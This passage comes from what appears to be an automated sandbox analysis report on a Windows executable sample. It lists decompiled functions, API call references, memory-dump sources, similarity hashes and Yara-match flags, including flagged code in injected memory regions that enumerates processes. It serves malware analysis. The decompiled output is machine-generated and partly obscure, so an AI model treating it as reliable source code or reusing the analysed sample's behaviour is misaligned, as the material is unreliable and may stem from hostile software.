                  • UnhandledExceptionFilter.KERNEL32(iF), ref: 00436687
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 004366A3
                  • TerminateProcess.KERNEL32(00000000), ref: 004366AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID: iF
                  • API String ID: 2579439406-3484524759
                  • Opcode ID: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction ID: 1fcaefbcb6034eab115c8829309213c744fcf1b54137cc21ca0acf14dfd41614
                  • Opcode Fuzzy Hash: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction Fuzzy Hash: 1E21F2B8801200EFC700DF95ED45A047BA8FB0A311F12907AE809A7B61F7F199858F4F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040963B, Relevance: 9.1, APIs: 6, Instructions: 117keyboardwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040963B(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t45;
				int _t46;
				void* _t53;
				void* _t61;
				signed int _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				void* _t67;
				int _t68;
				intOrPtr* _t74;

				_t64 = __ecx;
				_push(__ecx);
				_push(_t61);
				_push(_t67);
				_t74 = __ecx;
				_t66 = E0040F8D7(__ecx);
				_v8 = _t66;
				_t76 = _t66;
				if(_t66 == 0) {
					E00406436(_t61, _t64, _t67, _t74, _t76);
				}
				_t65 =  *((intOrPtr*)(_t74 + 0x80));
				_t62 = _a8;
				_t68 = _a4;
				if(_t65 == 0) {
					L5:
					if(_t62 != 0xffff) {
						_t45 = _t74 + 0xdc;
						__eflags =  *_t45;
						if( *_t45 != 0) {
							 *_t45 =  *_t45 & 0x00000000;
							__eflags = _t62 & 0x00002000;
							if((_t62 & 0x00002000) != 0) {
								__eflags =  *(_t74 + 0xd0) & 0x00000001;
								if(( *(_t74 + 0xd0) & 0x00000001) == 0) {
									_t65 = _t74;
									 *((intOrPtr*)( *_t74 + 0x160))(2);
									_t66 = _v8;
								}
							}
						}
						__eflags = _t68;
						if(_t68 == 0) {
							L28:
							_t36 = _t74 + 0xa8;
							 *_t36 =  *(_t74 + 0xa8) & 0x00000000;
							__eflags =  *_t36;
							goto L29;
						} else {
							__eflags = _t62 & 0x00000810;
							if((_t62 & 0x00000810) != 0) {
								goto L28;
							}
							__eflags = _t68 - 0xf000 - 0x1ef;
							if(_t68 - 0xf000 > 0x1ef) {
								__eflags = _t68 - 0xff00;
								if(_t68 < 0xff00) {
									L25:
									 *(_t74 + 0xa8) = _t68;
									L29:
									_t38 = _t66 + 0x3c;
									 *_t38 =  *(_t66 + 0x3c) | 0x00000040;
									__eflags =  *_t38;
									goto L30;
								}
								 *(_t74 + 0xa8) = 0xef1f;
								goto L29;
							}
							_t68 = (_t68 + 0xffff1000 >> 4) + 0xef00;
							__eflags = _t68;
							goto L25;
						}
					} else {
						 *(_t74 + 0x3c) =  *(_t74 + 0x3c) & 0xffffffbf;
						if( *((intOrPtr*)(_t66 + 0x68)) != 0) {
							 *(_t74 + 0xa8) = 0xe002;
						} else {
							 *(_t74 + 0xa8) = 0xe001;
						}
						SendMessageA( *(_t74 + 0x20), 0x362,  *(_t74 + 0xa8), 0);
						_t65 = _t74;
						_t53 =  *((intOrPtr*)( *_t74 + 0x16c))();
						if(_t53 != 0) {
							UpdateWindow( *(_t53 + 0x20));
						}
						if(_a12 == 0 && ( *(_t74 + 0xd0) & 0x00000001) == 0 && GetKeyState(0x79) >= 0 && GetKeyState(0x12) >= 0 &&  *((intOrPtr*)(_t74 + 0xe0)) == 0) {
							_t65 = _t74;
							 *((intOrPtr*)( *_t74 + 0x160))(2);
						}
						L30:
						_t46 =  *(_t74 + 0xa8);
						if(_t46 !=  *((intOrPtr*)(_t74 + 0xac))) {
							_t46 = E0040EE3C(_t62, _t65, GetParent( *(_t74 + 0x20)));
							if(_t46 != 0) {
								_t46 = PostMessageA( *(_t74 + 0x20), 0x36a, 0, 0);
							}
						}
						L33:
						return _t46;
					}
				}
				_t46 =  *((intOrPtr*)( *_t65 + 0x7c))(_t68, _t62, _a12);
				if(_t46 != 0) {
					goto L33;
				} else {
					_t66 = _v8;
					goto L5;
				}
			}


















                  0x0040963b
                  0x00409640
                  0x00409641
                  0x00409643
                  0x00409644
                  0x0040964b
                  0x0040964d
                  0x00409650
                  0x00409652
                  0x00409654
                  0x00409654
                  0x00409659
                  0x0040965f
                  0x00409662
                  0x00409667
                  0x0040967e
                  0x00409684
                  0x00409729
                  0x0040972f
                  0x00409732
                  0x00409734
                  0x00409737
                  0x0040973d
                  0x0040973f
                  0x00409746
                  0x0040974c
                  0x0040974e
                  0x00409754
                  0x00409754
                  0x00409746
                  0x0040973d
                  0x00409757
                  0x00409759
                  0x0040979b
                  0x0040979b
                  0x0040979b
                  0x0040979b
                  0x00000000
                  0x0040975b
                  0x0040975b
                  0x00409761
                  0x00000000
                  0x00000000
                  0x00409769
                  0x0040976e
                  0x00409787
                  0x0040978d
                  0x0040977f
                  0x0040977f
                  0x004097a2
                  0x004097a2
                  0x004097a2
                  0x004097a2
                  0x00000000
                  0x004097a2
                  0x0040978f
                  0x00000000
                  0x0040978f
                  0x00409779
                  0x00409779
                  0x00000000
                  0x00409779
                  0x0040968a
                  0x0040968a
                  0x00409692
                  0x004096a0
                  0x00409694
                  0x00409694
                  0x00409694
                  0x004096ba
                  0x004096c2
                  0x004096c4
                  0x004096cc
                  0x004096d1
                  0x004096d1
                  0x004096db
                  0x0040971f
                  0x00409721
                  0x00409721
                  0x004097a6
                  0x004097a6
                  0x004097b2
                  0x004097be
                  0x004097c5
                  0x004097d3
                  0x004097d3
                  0x004097c5
                  0x004097d9
                  0x004097dd
                  0x004097dd
                  0x00409684
                  0x00409670
                  0x00409675
                  0x00000000
                  0x0040967b
                  0x0040967b
                  0x00000000
                  0x0040967b

                  APIs
                  • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 004096BA
                  • UpdateWindow.USER32(?), ref: 004096D1
                  • GetKeyState.USER32(00000079), ref: 004096F6
                  • GetKeyState.USER32(00000012), ref: 00409703
                  • GetParent.USER32(?), ref: 004097B7
                  • PostMessageA.USER32 ref: 004097D3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageState$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
                  • String ID:
                  • API String ID: 2390574533-0
                  • Opcode ID: ae058b2c06a74a6d7ef1909f88a98cdc82120343aa06eeab77f5458c972cfe29
                  • Instruction ID: 1836aa11c96bc8b10af671f839b277ded5f5f4f49e82c4a39b0a723545f5ede0
                  • Opcode Fuzzy Hash: ae058b2c06a74a6d7ef1909f88a98cdc82120343aa06eeab77f5458c972cfe29
                  • Instruction Fuzzy Hash: 9541D536610705DFE7209F21C848FAB77A5BF51304F14483AE58A672D2CBBEAC40CB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00415026, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00415026(void* __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t20;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t36;
				signed int _t37;
				void* _t39;
				intOrPtr _t40;
				signed int _t45;
				void* _t46;

				_t36 = __edi;
				_t35 = __edx;
				_t31 = __ecx;
				_t43 = _t45;
				_t46 = _t45 - 0x11c;
				_t9 =  *0x463404; // 0x38a11573
				_v8 = _t9 ^ _t45;
				_t49 = _a4 - 0x800;
				_t39 = __ecx;
				_t28 = __edx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags == 0) {
						goto L10;
					} else {
						goto L4;
					}
				} else {
					E004048C1(__edx, _t31, __edi, _t39, E00433C67(__edx,  &_v288, 4, "LOC"));
					_t46 = _t46 + 0x10;
					L4:
					_push(_t36);
					_t37 =  *(E00431D3E(_t49));
					 *(E00431D3E(_t49)) =  *_t16 & 0x00000000;
					_push( &_v288);
					_t30 = E00431BC3( &_v284, 0x112, 0x111, _t39, _t28);
					_t20 = E00431D3E(_t49);
					_t50 =  *_t20;
					if( *_t20 == 0) {
						 *(E00431D3E(__eflags)) = _t37;
					} else {
						E00405B7A( *((intOrPtr*)(E00431D3E(_t50))));
					}
					_pop(_t36);
					if(_t30 == 0xffffffff || _t30 >= 0x112) {
						L10:
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = LoadLibraryA( &_v284);
					}
				}
				_pop(_t40);
				_pop(_t29);
				return E00430650(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
			}





















                  0x00415026
                  0x00415026
                  0x00415026
                  0x00415029
                  0x0041502b
                  0x00415031
                  0x00415038
                  0x0041503b
                  0x00415044
                  0x00415046
                  0x0041504e
                  0x00415076
                  0x00415078
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00415050
                  0x0041505e
                  0x00415063
                  0x0041507a
                  0x0041507a
                  0x00415080
                  0x00415087
                  0x00415090
                  0x004150ad
                  0x004150af
                  0x004150b4
                  0x004150b7
                  0x004150cd
                  0x004150b9
                  0x004150c0
                  0x004150c5
                  0x004150cf
                  0x004150d3
                  0x004150e8
                  0x004150e8
                  0x004150e8
                  0x004150d9
                  0x004150e0
                  0x004150e0
                  0x004150d3
                  0x004150ed
                  0x004150f0
                  0x004150f7

                  APIs
                  • _strcpy_s.LIBCMT ref: 00415058
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 00415070
                  • __snwprintf_s.LIBCMT ref: 004150A5
                  • LoadLibraryA.KERNEL32(?), ref: 004150E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
                  • String ID: LOC
                  • API String ID: 1155623865-519433814
                  • Opcode ID: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction ID: 9d7d416408e1e055de0116fb72f58f37d90779cb6da9a35a11098e22952e4239
                  • Opcode Fuzzy Hash: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction Fuzzy Hash: 49210D71700608EBD7217BA5CC46BDE37ACEF4A315F100867F205A71E1DA7C9E458AA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F28C1, Relevance: 7.9, APIs: 5, Instructions: 416COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction ID: f98831e3c7eae32b0ab60125a26eacce2da9133b5da6bf3e8bc862731f23f913
                  • Opcode Fuzzy Hash: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction Fuzzy Hash: 17025930910A6AEFCB1ACFA8C8947EAFB75FF06304F14027ACE5597645C736A561CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418BD1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00418BD1(void* __ecx, int _a4, int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t12;
				void* _t15;
				void* _t16;
				int _t19;
				void* _t20;

				_t17 = __ecx;
				_t19 = _a4;
				_t22 = _t19;
				if(_t19 == 0) {
					E00406436(_t15, __ecx, _t19, _t20, _t22);
				}
				_t16 = E0040EE3C(_t15, _t17, GetParent( *(_t19 + 0x20)));
				_t18 = _t16;
				if(E0041E99D(_t16, ?str?) != 0) {
					__eflags = _a8;
					if(_a8 != 0) {
						L8:
						return _t16;
					}
					while(1) {
						_t19 = E0040EE3C(_t16, _t18, GetParent( *(_t19 + 0x20)));
						__eflags = _t19;
						if(_t19 == 0) {
							goto L8;
						}
						_t12 = IsIconic( *(_t19 + 0x20));
						__eflags = _t12;
						if(_t12 != 0) {
							goto L3;
						}
					}
					goto L8;
				} else {
					L3:
					return 0;
				}
			}












                  0x00418bd1
                  0x00418bd9
                  0x00418bdc
                  0x00418bde
                  0x00418be0
                  0x00418be0
                  0x00418bf6
                  0x00418bfd
                  0x00418c06
                  0x00418c0c
                  0x00418c10
                  0x00418c32
                  0x00000000
                  0x00418c32
                  0x00418c21
                  0x00418c2c
                  0x00418c2e
                  0x00418c30
                  0x00000000
                  0x00000000
                  0x00418c17
                  0x00418c1d
                  0x00418c1f
                  0x00000000
                  0x00000000
                  0x00418c1f
                  0x00000000
                  0x00418c08
                  0x00418c08
                  0x00000000
                  0x00418c08

                  APIs
                  • GetParent.USER32(?), ref: 00418BEE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • IsIconic.USER32 ref: 00418C17
                  • GetParent.USER32(?), ref: 00418C24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Parent$Exception@8H_prolog3IconicThrow
                  • String ID: `&E
                  • API String ID: 144390861-1929257993
                  • Opcode ID: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction ID: 358e4306ae026a5a0e6fe1444b68b5067069f487fe9c63fcbe7e632c9dba3896
                  • Opcode Fuzzy Hash: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction Fuzzy Hash: C3F0A4353012096BDB202B73CC44A57BB5AEB903A4B11443FF80897210FE38DC5196F8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040C49C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E0040C49C(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E0040C354() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E0040C44B( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x46631c(_a4, _a8);
			}





                  0x0040c4ab
                  0x0040c4bf
                  0x0040c4d3
                  0x0040c4eb
                  0x0040c4d5
                  0x0040c4dc
                  0x0040c4dc
                  0x0040c4f3
                  0x00000000
                  0x0040c4f5
                  0x00000000
                  0x0040c4fc
                  0x0040c4f3
                  0x00000000
                  0x0040c4c1
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID: )@
                  • API String ID: 0-1834664782
                  • Opcode ID: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction ID: e39f0cd06dcc5d796e4c380b87086b00b9923f70f7885cf755144c167b23d7c0
                  • Opcode Fuzzy Hash: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction Fuzzy Hash: 14F01D35500108FBCF019FA1DC989BE7B69BB04344B548132FC15E51A0EB38DA56DB5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F3F3, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0040F3F3(void* __ecx) {
				signed int _t5;
				void* _t15;
				void* _t18;

				_t15 = __ecx;
				if((E00412B38(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E0040ED96(_t15, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t18 = E00403AA0();
				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t18 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}






                  0x0040f3f8
                  0x0040f404
                  0x0040f44c
                  0x0040f44e
                  0x0040f455
                  0x00000000
                  0x0040f457
                  0x0040f40b
                  0x0040f40f
                  0x00000000
                  0x0040f432
                  0x0040f441
                  0x00000000
                  0x0040f449

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetKeyState.USER32(00000010), ref: 0040F419
                  • GetKeyState.USER32(00000011), ref: 0040F422
                  • GetKeyState.USER32(00000012), ref: 0040F42B
                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0040F441
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: State$LongMessageSendWindow
                  • String ID:
                  • API String ID: 1063413437-0
                  • Opcode ID: 1899dafdfafa182dae73c6467cc00530cdf17fdce013a3a603e072924edb97ca
                  • Instruction ID: 270587ebcd8374511dc7763f2ca35ec055206ec1d6bb96e95a8e8fcfe1b62cfc
                  • Opcode Fuzzy Hash: 1899dafdfafa182dae73c6467cc00530cdf17fdce013a3a603e072924edb97ca
                  • Instruction Fuzzy Hash: 86F0E93634129A66EA3037724C41FA72D145FA1B9CF04043B7F01FA5D2CDB8D805027A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02311943, Relevance: 6.0, APIs: 4, Instructions: 37processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02311954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 02311973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02311983
                  • CloseHandle.KERNEL32(00000000), ref: 0231199F
                    • Part of subcall function 02312255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,0231199A,0000022C), ref: 02312273
                    • Part of subcall function 02312255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,0231199A,0000022C), ref: 02312284
                    • Part of subcall function 02312255: lstrcpyW.KERNEL32(00000004,?), ref: 023122B6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 881bf22f0b8eb8c12aa429e3a493a387c75fae2e217d6605055c958634ac79b6
                  • Instruction ID: 976f74ae00c6d524d40173f0aec0ba1599afe36a1ab3a1826384190c7e72da94
                  • Opcode Fuzzy Hash: 881bf22f0b8eb8c12aa429e3a493a387c75fae2e217d6605055c958634ac79b6
                  • Instruction Fuzzy Hash: C4F0F0719021287AE7386675BC0CBEFBA7CDB49320F1001A5ED19E2080E770891E8AE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042E202, Relevance: 4.6, APIs: 3, Instructions: 131stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E0042E202(intOrPtr __ebx, signed int __edx, CHAR* _a4, signed int* _a8) {
				signed int _v8;
				struct _WIN32_FIND_DATAA _v328;
				char _v336;
				void* __edi;
				void* __esi;
				signed int _t49;
				intOrPtr _t52;
				void* _t54;
				void* _t56;
				signed int* _t81;
				signed int* _t84;
				signed int* _t87;
				signed int _t90;
				CHAR* _t105;
				intOrPtr _t106;
				signed int* _t109;
				intOrPtr _t110;
				signed int _t114;

				_t103 = __edx;
				_t89 = __ebx;
				_t112 = _t114;
				_t49 =  *0x463404; // 0x38a11573
				_v8 = _t49 ^ _t114;
				_t109 = _a8;
				_t105 = _a4;
				if(_t105 != 0) {
					if(lstrlenA(_t105) >= 0x104) {
						goto L2;
					} else {
						_push(__ebx);
						_t90 =  &(_t109[8]);
						_t54 = E004292D1(_t90, _t105);
						if(_t54 != 0) {
							_t56 = FindFirstFileA(_t105,  &_v328);
							_t91 = _t90 | 0xffffffff;
							if(_t56 != (_t90 | 0xffffffff)) {
								FindClose(_t56);
								_t109[8] = _v328.dwFileAttributes & 0x0000007f;
								_t103 = 0;
								_t109[6] = E00435090(_v328.nFileSizeHigh, 0x20, 0);
								_t109[6] = _t109[6] | _v328.nFileSizeLow;
								_t109[7] = 0;
								if(E0042DF81( &(_v328.ftCreationTime)) == 0) {
									 *_t109 = 0;
									_t109[1] = 0;
								} else {
									_t87 = E0042E0A4( &_v336,  &(_v328.ftCreationTime), _t91);
									 *_t109 =  *_t87;
									_t109[1] = _t87[1];
								}
								if(E0042DF81( &(_v328.ftLastAccessTime)) == 0) {
									_t109[4] = 0;
									_t109[5] = 0;
								} else {
									_t84 = E0042E0A4( &_v336,  &(_v328.ftLastAccessTime), _t91);
									_t109[4] =  *_t84;
									_t109[5] = _t84[1];
								}
								if(E0042DF81( &(_v328.ftLastWriteTime)) == 0) {
									_t109[2] = 0;
									_t109[3] = 0;
								} else {
									_t81 = E0042E0A4( &_v336,  &(_v328.ftLastWriteTime), _t91);
									_t109[2] =  *_t81;
									_t109[3] = _t81[1];
								}
								if(( *_t109 | _t109[1]) == 0) {
									 *_t109 = _t109[2];
									_t109[1] = _t109[3];
								}
								if((_t109[4] | _t109[5]) == 0) {
									_t109[4] = _t109[2];
									_t109[5] = _t109[3];
								}
								_t52 = 1;
							} else {
								goto L7;
							}
						} else {
							 *_t90 = _t54;
							L7:
							_t52 = 0;
						}
						_pop(_t89);
					}
				} else {
					L2:
					_t52 = 0;
				}
				_pop(_t106);
				_pop(_t110);
				return E00430650(_t52, _t89, _v8 ^ _t112, _t103, _t106, _t110);
			}





















                  0x0042e202
                  0x0042e202
                  0x0042e205
                  0x0042e20d
                  0x0042e214
                  0x0042e218
                  0x0042e21c
                  0x0042e221
                  0x0042e236
                  0x00000000
                  0x0042e238
                  0x0042e238
                  0x0042e23a
                  0x0042e23e
                  0x0042e245
                  0x0042e253
                  0x0042e259
                  0x0042e25e
                  0x0042e268
                  0x0042e276
                  0x0042e281
                  0x0042e28a
                  0x0042e293
                  0x0042e29c
                  0x0042e2aa
                  0x0042e2cb
                  0x0042e2cd
                  0x0042e2ac
                  0x0042e2ba
                  0x0042e2c1
                  0x0042e2c6
                  0x0042e2c6
                  0x0042e2de
                  0x0042e304
                  0x0042e307
                  0x0042e2e0
                  0x0042e2ee
                  0x0042e2f5
                  0x0042e2fb
                  0x0042e2fb
                  0x0042e318
                  0x0042e33e
                  0x0042e341
                  0x0042e31a
                  0x0042e328
                  0x0042e32f
                  0x0042e335
                  0x0042e335
                  0x0042e349
                  0x0042e34e
                  0x0042e353
                  0x0042e353
                  0x0042e35c
                  0x0042e361
                  0x0042e367
                  0x0042e367
                  0x0042e36c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042e247
                  0x0042e247
                  0x0042e260
                  0x0042e260
                  0x0042e260
                  0x0042e36d
                  0x0042e36d
                  0x0042e223
                  0x0042e223
                  0x0042e223
                  0x0042e223
                  0x0042e371
                  0x0042e374
                  0x0042e37b

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrlen
                  • String ID:
                  • API String ID: 1659193697-0
                  • Opcode ID: fba665bc180cf6534a8231a3261d8d4e4ffe5eeadfc711bd2cc042cdb0669267
                  • Instruction ID: 0a378aa4b9d3e6ad2690f9bed7cbbdce6e48e36b13377e815d177be264a16cbb
                  • Opcode Fuzzy Hash: fba665bc180cf6534a8231a3261d8d4e4ffe5eeadfc711bd2cc042cdb0669267
                  • Instruction Fuzzy Hash: 70511775A00714DFC720DF26E98099BB7F8BF58300B5089AEE49BC3610E734EA44CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424B11, Relevance: 3.0, APIs: 2, Instructions: 41keyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424B11(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t12;
				signed int _t15;
				void* _t20;

				_t20 = __ecx;
				_t15 = E00412B38(__ecx);
				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000100) == 0)) {
					L6:
					return E004090E8(_t15, _t20, _a4, _a8);
				}
				_t12 = E004105DA(_t15, _t20, _a4, _a8);
				if(_t12 == 0) {
					goto L6;
				}
				return _t12;
			}







                  0x00424b19
                  0x00424b20
                  0x00424b24
                  0x00424b66
                  0x00000000
                  0x00424b6e
                  0x00424b5d
                  0x00424b64
                  0x00000000
                  0x00000000
                  0x00424b77

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetKeyState.USER32(00000073), ref: 00424B3D
                  • GetKeyState.USER32(00000012), ref: 00424B46
